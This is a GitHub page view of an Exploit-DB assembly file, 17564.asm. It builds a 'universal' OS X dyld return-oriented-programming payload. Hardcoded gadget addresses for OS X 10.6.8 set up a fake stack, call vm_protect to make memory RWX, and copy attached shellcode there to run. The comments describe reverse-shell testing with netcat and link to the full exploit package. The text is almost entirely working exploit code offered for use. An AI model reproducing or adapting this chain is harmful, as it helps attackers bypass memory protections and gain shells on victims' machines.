FilesExpand file tree

 master

/

17564.asm

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

203 lines (165 loc) · 4.76 KB

 master

/

17564.asm

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

203 lines (165 loc) · 4.76 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

; universal OSX dyld ROP shellcode

; tested on OS X 10.6.8

;

; if you don't want to compile, copy stage0 code from precompiled.txt

; and append your normal shellcode to it.

;

; usage:

; - put your 'normal' shellcode in x64_shellcode.asm

; - make

; - ./sc

;

; if you want to test:

; - uncomment lea rsp, [rel rop_stage0] / ret

; - make

; - nc -l 4444

; - ./sc

; - you should get a shell over nc

;

; see my blog, if you want to know how this works:

; http://gdtr.wordpress.com

;

; greets to Jacob Hammack, for his reverse tcp shellcode (hammackj.com).

;

; pa_kt

; twitter.com/pa_kt

extern _printf

global _main

;--------------------------------------------------

;- DATA

;--------------------------------------------------

section .data

rw_area equ 0x00007FFF5FC50000

rwx_area equ rw_area+0x1000

vm_prot equ 0x00007FFF5FC0D356

fake_stack equ rw_area+0x2000

fake_frame equ fake_stack+0x100

r12_zero equ rw_area-0x1000

rax_off equ rw_area-8

rbx_off equ rw_area+8-8

rcx_off equ rw_area+0x10-8

rdx_off equ rw_area+0x18-8

rsi_off equ rw_area+0x28-8

rbp_off equ rw_area+0x30-8

rsp_off equ rw_area+0x38-8

r8_off equ rw_area+0x40-8

r12_off equ rw_area+0x60-8

pop_rdi equ 0x00007FFF5FC24CDC

pop_rbx equ 0x00007FFF5FC23373

store_reg equ 0x00007FFF5FC24CE1

set_regs equ 0x00007FFF5FC24CA1

c_rwx equ 7

c_size equ 0x1000

c_addr equ rwx_area

c_set_max equ 0

dbg_ret equ 0x00007FFF5FC24C4B

; copy shellcode to RWX area

; size = 0x1000

stub:

lea rsi, [r15+saved_rsp_off+copy_stub_size+rop_post_size]

xor rcx, rcx

inc rcx

shl rcx, 12 ;rcx = 0x1000

lea rdi, [rel normal_shellcode]

rep movsb

;int 3

normal_shellcode:

stub_size equ $-stub

; order is important

rop_pre dq pop_rdi, rcx_off, pop_rbx, c_set_max, store_reg,

dq pop_rdi, rdx_off, pop_rbx, c_size, store_reg,

dq pop_rdi, rsi_off, pop_rbx, c_addr, store_reg,

dq pop_rdi, rbp_off, pop_rbx, fake_frame, store_reg,

dq pop_rdi, rsp_off, pop_rbx, fake_stack, store_reg,

dq pop_rdi, r8_off, pop_rbx, c_rwx, store_reg,

dq pop_rdi, r12_off, pop_rbx, r12_zero, store_reg,

; set fake stack

dq pop_rdi, fake_stack+8-8, pop_rbx, vm_prot, store_reg,

; set fake frame (return address -> rwx page)

dq pop_rdi, fake_frame-8-0x38, store_reg,

saved_rsp:

dq pop_rdi, fake_frame+8-8, pop_rbx, rwx_area, store_reg,

rop_pre_size equ $-rop_pre

saved_rsp_off equ $-saved_rsp-8

rop_post dq dbg_ret

; set all regs and jump to vm_prot

dq pop_rdi, rw_area, set_regs

; marker

; dq 0x1111111111111111

rop_post_size equ $-rop_post

x64_shellcode: incbin "x64_shellcode"

x64_shellcode_size equ $-x64_shellcode

hello db "test", 0

fmt db "\x%02x",0

section .bss

rop_stage0 resq 100

copy_stub resq ((stub_size+7)/8)*5

copy_stub_size equ $-copy_stub

;--------------------------------------------------

;- CODE

;--------------------------------------------------

section .text

prep_stub:

mov rcx, (stub_size+7)/8

mov rsi, stub

mov rdi, copy_stub

mov rbx, rwx_area-8

go:

mov rax, pop_rdi

stosq

mov rax, rbx

stosq

mov rax, pop_rbx

stosq

movsq

mov rax, store_reg

stosq

add rbx, 8

loop go

ret

make_stage0:

mov rsi, rop_pre

mov rdi, rop_stage0

mov rcx, rop_pre_size

rep movsb

mov rsi, copy_stub

mov rcx, copy_stub_size

rep movsb

mov rsi, rop_post

mov rcx, rop_post_size

rep movsb

mov rsi, x64_shellcode

mov rcx, x64_shellcode_size

rep movsb

ret

print_it:

push rbp

mov rbp, rsp

mov rcx, rop_pre_size + copy_stub_size + rop_post_size + x64_shellcode_size

lea rsi, [rel rop_stage0]

xor rax, rax

one_char:

lodsb

push rsi

push rcx

mov rsi, rax

mov rdi, qword fmt

xor rax, rax

call _printf

pop rcx

pop rsi

loop one_char

leave

ret

_main:

push qword rbp

mov rbp, rsp

call prep_stub

call make_stage0

call print_it

;lea rsp, [rel rop_stage0]

;ret

leave

ret

; see http://t.co/nIrRbn5 for a detailed explanation

; full package mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17564.tgz (osx.rop.24072011.tgz)